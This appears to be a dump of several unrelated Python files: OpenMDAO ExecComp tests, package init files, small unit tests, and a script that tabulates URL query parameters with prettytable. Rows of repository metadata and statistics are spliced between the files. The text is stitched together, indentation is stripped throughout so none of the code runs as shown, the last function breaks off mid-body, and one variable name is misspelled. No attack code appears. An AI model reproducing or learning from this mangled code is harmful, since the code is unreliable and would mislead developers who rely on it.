if __name__ == "__main__":
for line in sys.stdin:
print detokenize_nltk(line.strip())
| 45.333333 | 93 | 0.38317 | 389 | 2,448 | 2.385604 | 0.138817 | 0.265086 | 0.397629 | 0.387931 | 0.762931 | 0.705819 | 0.645474 | 0.59806 | 0.491379 | 0.487069 | 0 | 0.017635 | 0.212418 | 2,448 | 53 | 94 | 46.188679 | 0.463693 | 0.39134 | 0 | 0 | 0 | 0.064516 | 0.228924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.032258 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
071e8fe30410dd9caef12e723f7f683e194345b7 | 11,535 | py | Python | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 17 | 2018-01-11T20:13:59.000Z | 2022-03-22T03:46:05.000Z | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 6 | 2017-10-19T23:14:14.000Z | 2020-11-22T17:30:57.000Z | openmdao/components/test/test_exec_comp.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | [
"Apache-2.0"
] | 10 | 2018-04-12T22:13:33.000Z | 2020-05-07T10:02:59.000Z | import unittest
import math
import numpy as np
from openmdao.api import IndepVarComp, Group, Problem, ExecComp
from openmdao.test.util import assert_rel_error
class TestExecComp(unittest.TestCase):
def test_bad_kwargs(self):
prob = Problem(root=Group())
try:
C1 = prob.root.add('C1', ExecComp('y=x+1.', xx=2.0))
except Exception as err:
self.assertEqual(str(err), "Arg 'xx' in call to ExecComp() does not refer to any variable in the expressions ['y=x+1.']")
def test_mixed_type(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=numpy.sum(x)',
x=np.arange(10,dtype=float)))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 45.0, 0.00001)
def test_simple(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x+1.', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 3.0, 0.00001)
def test_for_spaces(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y = pi * x', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
self.assertTrue('pi' not in C1._init_params_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 2 * math.pi, 0.00001)
def test_units(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x+z+1.', x=2.0, z=2.0, units={'x':'m','y':'m'}))
self.assertTrue('units' in C1._init_params_dict['x'])
self.assertTrue(C1._init_params_dict['x']['units'] == 'm')
self.assertTrue('units' in C1._init_unknowns_dict['y'])
self.assertTrue(C1._init_unknowns_dict['y']['units'] == 'm')
self.assertFalse('units' in C1._init_params_dict['z'])
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 5.0, 0.00001)
def test_math(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=sin(x)', x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], math.sin(2.0), 0.00001)
def test_array(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=x[1]', x=np.array([1.,2.,3.]), y=0.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 2.0, 0.00001)
def test_array_lhs(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['y[0]=x[1]', 'y[1]=x[0]'],
x=np.array([1.,2.,3.]), y=np.array([0.,0.])))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], np.array([2.,1.]), 0.00001)
def test_simple_array_model(self):
prob = Problem()
prob.root = Group()
prob.root.add('comp', ExecComp(['y[0]=2.0*x[0]+7.0*x[1]',
'y[1]=5.0*x[0]-3.0*x[1]'],
x=np.zeros([2]), y=np.zeros([2])))
prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5)
def test_simple_array_model2(self):
prob = Problem()
prob.root = Group()
comp = prob.root.add('comp', ExecComp('y = mat.dot(x)',
x=np.zeros((2,)), y=np.zeros((2,)),
mat=np.array([[2.,7.],[5.,-3.]])))
p1 = prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5)
def test_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['y=2.0*x+1.'], x=2.0))
self.assertTrue('x' in C1._init_params_dict)
self.assertTrue('y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 5.0, 0.00001)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
def test_complex_step2(self):
prob = Problem(Group())
comp = prob.root.add('comp', ExecComp('y=x*x + x*2.0'))
prob.root.add('p1', IndepVarComp('x', 2.0))
prob.root.connect('p1.x', 'comp.x')
comp.deriv_options['type'] = 'user'
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['p1.x'], ['comp.y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['comp.y']['p1.x'], np.array([6.0]), 0.00001)
J = prob.calc_gradient(['p1.x'], ['comp.y'], mode='rev', return_format='dict')
assert_rel_error(self, J['comp.y']['p1.x'], np.array([6.0]), 0.00001)
def test_abs_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=2.0*abs(x)', x=-2.0))
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], 4.0, 0.00001)
# any negative C1.x should give a -2.0 derivative for dy/dx
prob['C1.x'] = -1.0e-10
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], -2.0, 0.00001)
prob['C1.x'] = 3.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
prob['C1.x'] = 0.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], 2.0, 0.00001)
def test_abs_array_complex_step(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('y=2.0*abs(x)',
x=np.ones(3)*-2.0, y=np.zeros(3)))
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['y'], np.ones(3)*4.0, 0.00001)
# any negative C1.x should give a -2.0 derivative for dy/dx
prob['C1.x'] = np.ones(3)*-1.0e-10
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*-2.0, 0.00001)
prob['C1.x'] = np.ones(3)*3.0
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*2.0, 0.00001)
prob['C1.x'] = np.zeros(3)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('y','x')], np.eye(3)*2.0, 0.00001)
prob['C1.x'] = np.array([1.5, -0.6, 2.4])
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
expect = np.zeros((3,3))
expect[0,0] = 2.0
expect[1,1] = -2.0
expect[2,2] = 2.0
assert_rel_error(self, J[('y','x')], expect, 0.00001)
def test_colon_names(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp('a:y=a:x+1.+b', inits={'a:x':2.0}, b=0.5))
self.assertTrue('a:x' in C1._init_params_dict)
self.assertTrue('a:y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['a:y'], 3.5, 0.00001)
def test_complex_step_colons(self):
prob = Problem(root=Group())
C1 = prob.root.add('C1', ExecComp(['foo:y=2.0*foo:bar:x+1.'], inits={'foo:bar:x':2.0}))
self.assertTrue('foo:bar:x' in C1._init_params_dict)
self.assertTrue('foo:y' in C1._init_unknowns_dict)
prob.setup(check=False)
prob.run()
assert_rel_error(self, C1.unknowns['foo:y'], 5.0, 0.00001)
J = C1.linearize(C1.params, C1.unknowns, C1.resids)
assert_rel_error(self, J[('foo:y','foo:bar:x')], 2.0, 0.00001)
def test_complex_step2_colons(self):
prob = Problem(Group())
comp = prob.root.add('comp', ExecComp('foo:y=foo:x*foo:x + foo:x*2.0'))
prob.root.add('p1', IndepVarComp('x', 2.0))
prob.root.connect('p1.x', 'comp.foo:x')
comp.deriv_options['type'] = 'user'
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['p1.x'], ['comp.foo:y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['comp.foo:y']['p1.x'], np.array([6.0]), 0.00001)
J = prob.calc_gradient(['p1.x'], ['comp.foo:y'], mode='rev', return_format='dict')
assert_rel_error(self, J['comp.foo:y']['p1.x'], np.array([6.0]), 0.00001)
def test_simple_array_model2_colons(self):
prob = Problem()
prob.root = Group()
comp = prob.root.add('comp', ExecComp('foo:y = foo:mat.dot(x)',
inits={'foo:y':np.zeros((2,)),
'foo:mat':np.array([[2.,7.],[5.,-3.]])},
x=np.zeros((2,))))
p1 = prob.root.add('p1', IndepVarComp('x', np.ones([2])))
prob.root.connect('p1.x', 'comp.x')
prob.setup(check=False)
prob.run()
data = prob.check_partial_derivatives(out_stream=None)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['abs error'][2], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][0], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][1], 0.0, 1e-5)
assert_rel_error(self, data['comp'][('foo:y','x')]['rel error'][2], 0.0, 1e-5)
if __name__ == "__main__":
unittest.main()
| 37.696078 | 133 | 0.549718 | 1,802 | 11,535 | 3.392342 | 0.077137 | 0.06936 | 0.100769 | 0.126615 | 0.867168 | 0.835433 | 0.809586 | 0.782267 | 0.765254 | 0.74726 | 0 | 0.064298 | 0.243606 | 11,535 | 305 | 134 | 37.819672 | 0.636332 | 0.00997 | 0 | 0.522936 | 0 | 0.004587 | 0.095121 | 0.005781 | 0 | 0 | 0 | 0 | 0.316514 | 1 | 0.082569 | false | 0 | 0.022936 | 0 | 0.110092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
072b528fe55db058c78dafce62ff4a8b76ddf6cf | 630 | py | Python | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 202 | 2017-07-24T23:22:38.000Z | 2022-03-22T15:33:46.000Z | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 538 | 2017-06-21T08:04:43.000Z | 2022-03-31T14:36:45.000Z | parcels/interaction/neighborsearch/__init__.py | noemieplanat/Copy-parcels-master | 21f053b81a9ccdaa5d8ee4f7efd6f01639b83bfc | [
"MIT"
] | 94 | 2017-07-05T10:28:55.000Z | 2022-03-23T19:46:23.000Z | from parcels.interaction.neighborsearch.hashflat import HashFlatNeighborSearch
from parcels.interaction.neighborsearch.hashspherical import HashSphericalNeighborSearch # noqa
from parcels.interaction.neighborsearch.bruteforce import BruteFlatNeighborSearch # noqa
from parcels.interaction.neighborsearch.bruteforce import BruteSphericalNeighborSearch # noqa
from parcels.interaction.neighborsearch.kdtreeflat import KDTreeFlatNeighborSearch # noqa
__all__ = ["HashFlatNeighborSearch", "HashSphericalNeighborSearch",
"BruteFlatNeighborSearch",
"BruteSphericalNeighborSearch", "KDTreeFlatNeighborSearch"]
| 63 | 96 | 0.844444 | 45 | 630 | 11.733333 | 0.355556 | 0.104167 | 0.208333 | 0.340909 | 0.287879 | 0.212121 | 0.212121 | 0 | 0 | 0 | 0 | 0 | 0.098413 | 630 | 9 | 97 | 70 | 0.929577 | 0.030159 | 0 | 0 | 0 | 0 | 0.20462 | 0.20462 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0743c92fe2c85c90712a668acb30f85012c1d914 | 107 | py | Python | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | 1 | 2015-04-22T15:03:06.000Z | 2015-04-22T15:03:06.000Z | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | null | null | null | tests/test_GitSync.py | ClockworkNet/GitSync | fa8494b6078096d5982beef47ee11549923b576b | [
"MIT"
] | null | null | null | from gitsync import GitSync
def test_main():
assert GitSync.kFSEventStreamEventFlagNone == 0x00000000
| 21.4 | 60 | 0.803738 | 11 | 107 | 7.727273 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097826 | 0.140187 | 107 | 4 | 61 | 26.75 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093458 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07565be8f95d8891ab3852d533efdbd07fe02012 | 994 | py | Python | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | tests/support.py | gsakkis/typecheck | bc49d8651eff5944179967af55156219a0228b03 | [
"MIT"
] | null | null | null | import unittest
class TestCase(unittest.TestCase):
def multipleAssertEqual(self, eq_tests, ne_tests, repeats=10):
# We run this multiple times to try and shake out any errors
# related to differences in set/dict/etc ordering
for _ in xrange(0, repeats):
for left, right in eq_tests:
self.assertTrue(left == right)
self.assertFalse(left != right)
for left, right in ne_tests:
self.assertTrue(left != right)
self.assertFalse(left == right)
def multipleAssertEqualHashes(self, eq_tests, ne_tests, repeats=10):
# We run this multiple times to try and shake out any errors
# related to differences in set/dict/etc ordering
for _ in xrange(0, repeats):
for left, right in eq_tests:
self.assertTrue(hash(left) == hash(right))
for left, right in ne_tests:
self.assertTrue(hash(left) != hash(right))
| 41.416667 | 72 | 0.612676 | 126 | 994 | 4.753968 | 0.31746 | 0.1202 | 0.080134 | 0.093489 | 0.844741 | 0.844741 | 0.844741 | 0.796327 | 0.796327 | 0.560935 | 0 | 0.008708 | 0.306841 | 994 | 23 | 73 | 43.217391 | 0.860668 | 0.214286 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab19d7c20fe980eb2413410f19c809bc83a9d1c7 | 142 | py | Python | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 2,216 | 2020-07-09T19:10:11.000Z | 2022-03-31T12:39:26.000Z | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 1,174 | 2020-07-10T07:02:28.000Z | 2022-03-31T12:38:56.000Z | mmdet3d/ops/paconv/__init__.py | Guangyun-Xu/mmdetection3d | 75c5c6cd590386bd1539a686c5fd2cc45c5480d5 | [
"Apache-2.0"
] | 681 | 2020-07-09T19:40:06.000Z | 2022-03-31T11:02:24.000Z | from .assign_score import assign_score_withk
from .paconv import PAConv, PAConvCUDA
__all__ = ['assign_score_withk', 'PAConv', 'PAConvCUDA']
| 28.4 | 56 | 0.795775 | 18 | 142 | 5.777778 | 0.444444 | 0.317308 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105634 | 142 | 4 | 57 | 35.5 | 0.818898 | 0 | 0 | 0 | 0 | 0 | 0.239437 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab2ae7ad342a4caf68f7a89108b5c92dadafb27a | 30 | py | Python | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | null | null | null | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | 15 | 2020-11-07T20:21:30.000Z | 2021-03-31T09:51:51.000Z | src/core/app/app/views/__init__.py | WeAreBeep/FrontLineLive | faffe0672996eea3d6ada18e4a7fccb4419cac2f | [
"MIT"
] | 11 | 2020-11-07T18:46:12.000Z | 2022-03-13T15:50:30.000Z | from .map import get_map_data
| 15 | 29 | 0.833333 | 6 | 30 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab4719f31350884bbe00738f70af0f4cd959e392 | 95 | py | Python | tests/test_dbd.py | AlexRogalskiy/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | 33 | 2022-01-09T09:32:17.000Z | 2022-03-05T18:52:11.000Z | tests/test_dbd.py | zsvoboda/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | 2 | 2022-02-16T19:14:13.000Z | 2022-02-16T19:14:34.000Z | tests/test_dbd.py | zsvoboda/dbd | ac2c6fb673861321b23fbf2a57d9e39fa5cb5352 | [
"BSD-3-Clause"
] | null | null | null | import importlib
def test_version():
assert importlib.metadata.version('dbd') == '0.8.9'
| 15.833333 | 55 | 0.694737 | 13 | 95 | 5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.147368 | 95 | 5 | 56 | 19 | 0.765432 | 0 | 0 | 0 | 0 | 0 | 0.084211 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.666667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab56e221fdb3eeeefe9347649fa87fc354646d99 | 19,419 | py | Python | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 1 | 2019-12-25T04:20:19.000Z | 2019-12-25T04:20:19.000Z | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 13 | 2020-01-16T03:23:50.000Z | 2020-11-25T11:55:29.000Z | src/datashow/prettytable/url_query_display.py | snowdreams1006/learn-python | d224bedbb670b6462e1e9a013c0a0316be10207c | [
"MIT"
] | 1 | 2020-03-28T11:46:03.000Z | 2020-03-28T11:46:03.000Z | # -*- coding: utf-8 -*-
from urllib.parse import urlparse, parse_qs, parse_qsl
from prettytable import PrettyTable
import numpy as np
def simple_table_demo():
''''
展示美化表格简单示例
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
print('>>>simple_table_demo<<<')
print(table)
def sorted_table_demo():
'''
展示按照指定字段排序后的表格
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
print('>>>sorted_table_demo<<<')
print(table)
# 按照人口进行正向排序
sorted_table = table.get_string(sortby="Population", reversesort=False)
print('>>>按照人口进行正向排序(sortby="Population", reversesort=False)<<<')
print(sorted_table)
def selected_table_demo():
'''
筛选出特定表格进行美化展示
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
print('>>>selected_table_demo<<<')
print(table)
# 按照标题进行筛选
selected_table = table.get_string(fields=["Area", "Population"])
print('>>>按照标题进行筛选["Area", "Population"]<<<')
print(selected_table)
def simple_url_parse_demo():
'''
解析 url 链接参数简单示例
'''
# get 查询 url
url_get = 'https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581465946282'
# 解析 url参数信息,主要提取请求路径,查询参数
path = urlparse(url_get).path
query = urlparse(url_get).query
print(">>>simple_url_parse_demo<<<")
print(path,query)
# 查询参数解析成字典形式
query_dict = parse_qs(query)
print(">>>query_dict<<<")
print(query_dict)
# 查询参数解析成列表形式
query_list = parse_qsl(query)
print(">>>query_list<<<")
print(query_list)
def get_urls_with_query_params(urls):
# 提取有效链接
valid_urls = []
# 无效请求数据
if not urls:
return valid_ulrs
# 先去除首尾空格再按照换行符分隔
urls = urls.strip().split('\n')
# 针对单个链接剔除首尾空格
for url in urls:
valid_url = url.strip()
if valid_url:
valid_urls.append(valid_url)
return valid_urls
def parse_urls_with_query_params(urls):
'''
批量解析有效 url 并处理成 prettytable的表头和数据
'''
# 提取有效链接
valid_urls = get_urls_with_query_params(urls)
if not valid_urls or len(valid_urls) == 0:
return None
# 全部url 查询参数列表
origin_query_param_list = []
for valid_url in valid_urls:
# url 查询参数可能不完全相同
query = urlparse(valid_url).query
query_list = parse_qsl(query)
# 不论解析结果,直接添加到原始解析列表
origin_query_param_list.append(query_list)
# 查询参数标题,即提取出最长查询参数列表
query_param_list = []
longest_query_param_set = set()
for origin_query_param_item in origin_query_param_list:
for origin_query_param_detail_item in origin_query_param_item:
longest_query_param_set.add(origin_query_param_detail_item[0])
query_param_list = list(longest_query_param_set)
# 查询参数数据,注意顺序保持一致!
query_value_list = []
for origin_query_param_item in origin_query_param_list:
query_value_item = []
for query_param_item in query_param_list:
has_find_valid_param_value_flag = False
for origin_query_param_detail_item in origin_query_param_item:
name = origin_query_param_detail_item[0]
value = origin_query_param_detail_item[1]
if query_param_item == name:
has_find_valid_param_value_flag = True
query_value_item.append(value)
break
# 参数不足时补齐""
if not has_find_valid_param_value_flag:
query_value_item.append('')
query_value_list.append(query_value_item)
return query_param_list,query_value_list
def show_with_prettytable(table_names_list,table_values_list):
'''
展示美化表格
'''
# 美化展示请求参数
table = PrettyTable()
table.field_names = table_names_list
for query_values in table_values_list:
table.add_row(query_values)
return table
def show_urls_with_query_params(urls):
'''
表格化展示url查询参数
'''
# 表头和数据
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# 美化展示请求参数
table = show_with_prettytable(query_names_list,query_values_list)
print('>>>表格化展示查询参数<<<')
print(table)
print()
def show_diff_urls_with_query_params(urls):
'''
表格化展示差异性查询参数
'''
# 表头和数据
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# 美化展示请求参数
table = show_with_prettytable(query_names_list,query_values_list)
print('>>>表格化展示全部查询参数<<<')
print(table)
print()
# 按列提取出相同类型的数据
query_param_dict = {}
for query_name_index, query_name in enumerate(query_names_list):
query_name_values = []
for query_value in query_values_list:
query_name_values.append(query_value[query_name_index])
query_param_dict[query_name] = query_name_values
# 字段字典转set集合去重得到差异性字段
exclude_query_names_list = ['timestamp']
diff_query_names_list = []
for query_param_name in query_param_dict:
diff_param_value_set = set(query_param_dict.get(query_param_name))
if len(diff_param_value_set) > 1 and (query_param_name not in exclude_query_names_list):
diff_query_names_list.append(query_param_name)
# 展示筛选字段列表
selected_table = table.get_string(fields=diff_query_names_list)
print('>>>仅展示差异性查询表格<<<')
print(selected_table)
print()
def filter_diff_urls_with_query_params(urls,code_name_relation_map={}):
'''
先过滤差异性数据再表格化展示查询参数
'''
# 表头和数据
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# 按列提取出相同类型的数据
query_param_dict = {}
for query_name_index, query_name in enumerate(query_names_list):
query_name_values = []
for query_value in query_values_list:
query_name_values.append(query_value[query_name_index])
query_param_dict[query_name] = query_name_values
